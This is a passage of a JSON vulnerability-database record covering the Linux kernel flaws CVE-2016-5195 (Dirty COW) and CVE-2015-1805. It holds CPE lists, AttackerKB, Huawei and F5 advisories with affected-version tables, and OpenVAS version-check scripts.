"2020-02-17T16:15:00", "cpe": ["cpe:/o:redhat:enterprise_linux_aus:6.2", "cpe:/o:redhat:enterprise_linux_eus:7.1", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux_long_life:5.6", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_eus:6.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_aus:6.5", "cpe:/o:redhat:enterprise_linux_eus:6.7", "cpe:/o:redhat:enterprise_linux_tus:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_long_life:5.9", "cpe:/o:redhat:enterprise_linux_aus:6.4", "cpe:/o:canonical:ubuntu_core:15.04", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_core:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-22T06:19:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "Race 
condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \u201cDirty COW.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:23am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-11-10T00:00:00", "id": "AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F", "href": "https://attackerkb.com/topics/E6o7dgfSHk/cve-2016-5195", "type": "attackerkb", "title": "CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:19", "bulletinFamily": "software", "cvelist": ["CVE-2015-0569", "CVE-2015-0570", "CVE-2015-0571"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2016-01-29T00:00:00", "published": "2015-11-24T00:00:00", "id": "HUAWEI-SA-20151124-01-SMARTPHONE", "href": "https://www.huawei.com/en/psirt/security-advisories/2015/hw-462918", "title": "Security Advisory - Memory Overflow Vulnerability in the Huawei Smartphone", "type": "huawei", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2017-06-08T00:16:21", "bulletinFamily": "software", "cvelist": ["CVE-2015-1805"], "edition": 1, "description": "\nF5 Product Development has assigned ID 527660 (BIG-IP), ID 530553 (Enterprise Manager), ID 530554 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \n \nBIG-IP AAM | 11.4.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP AFM | 11.3.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP Analytics | 11.0.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP APM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP ASM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP DNS \n| None \n| 12.0.0 \n| Not vulnerable | None \n \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP GTM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP Link Controller | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP PEM | 11.3.0 - 11.6.0 \n| 12.0.0 \n| Medium | Linux kernel \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Medium | Linux kernel \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n 
\nEnterprise Manager | 3.0.0 - 3.1.1 \n| None \n| Medium | Linux kernel \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable \n| None \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0 \n| None \n| Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 \n| None \n| Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 \n| None \n| Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 \n| None \n| Medium | Linux kernel \nLineRate | None \n| 2.5.0 - 2.6.1 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | None \n| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable | None \n\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for BIG-IP, Enterprise Manager, and BIG-IQ, you should permit access to the system only over a secure network and limit login access to trusted users. 
For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2016-01-09T02:33:00", "published": "2015-10-20T02:20:00", "href": "https://support.f5.com/csp/article/K17458", "id": "F5:K17458", "title": "Linux kernel vulnerability CVE-2015-1805", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:56", "bulletinFamily": "software", "cvelist": ["CVE-2015-1805"], "edition": 1, "description": "Recommended Action\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. 
The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for BIG-IP, Enterprise Manager, and BIG-IQ, you should permit access to the system only over a secure network and limit login access to trusted users. For more information, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "modified": "2015-10-19T00:00:00", "published": "2015-10-19T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/400/sol17458.html", "id": "SOL17458", "title": "SOL17458 - Linux kernel vulnerability CVE-2015-1805", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "\nF5 Product Development has assigned IDs 624457 and 624459 (BIG-IP), ID 625230 (BIG-IQ), ID 625231 (Enterprise Manager), INSTALLER-2794 (Traffix SDC), and ID 625362 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H624248 on the **Diagnostics** > **Identified** > **High** page. 
\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PSM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 
\n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel \nBIG-IP WOM | 11.2.1 | None | High | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b11.6.2 \n11.6.1 HF2 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | 3.1.1 HF8 | High | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.0.2 - 2.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2019-09-26T18:41:00", "published": "2016-10-21T18:38:00", "id": "F5:K10558632", "href": "https://support.f5.com/csp/article/K10558632", "title": "Linux privilege-escalation vulnerability CVE-2016-5195 ", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-21T17:25:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "Supplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10558632.html", "id": "SOL10558632", "type": "f5", "title": "SOL10558632 - Linux privilege-escalation vulnerability (Dirty COW) CVE-2016-5195", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": 
[{"lastseen": "2020-04-07T18:46:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2015-10-21T00:00:00", "id": "OPENVAS:1361412562310105417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105417", "type": "openvas", "title": "F5 BIG-IP - SOL17458 - Linux kernel vulnerability CVE-2015-1805", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL17458 - Linux kernel vulnerability CVE-2015-1805\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105417\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL17458 - Linux kernel vulnerability CVE-2015-1805\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/17000/400/sol17458.html?sr=48878043\");\n\n script_tag(name:\"impact\", value:\"A local unprivileged user may use this flaw to crash the system, or potentially escalate their privileges on the system.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an 'I/O vector array overrun.' 
(CVE-2015-1805)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-21 15:00:41 +0200 (Wed, 21 Oct 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "Oracle Linux Local Security Checks ELSA-2015-1042", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123109", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1042", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1042.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123109\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:29 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1042\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1042 - kernel security and bug fix update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1042\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1042.html\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.el5\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5PAE~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5debug~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5xen~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5xen~2.0.5~1.el5\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "Oracle Linux Local Security Checks ELSA-2015-1042-1", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123108", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1042-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1042-1.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free 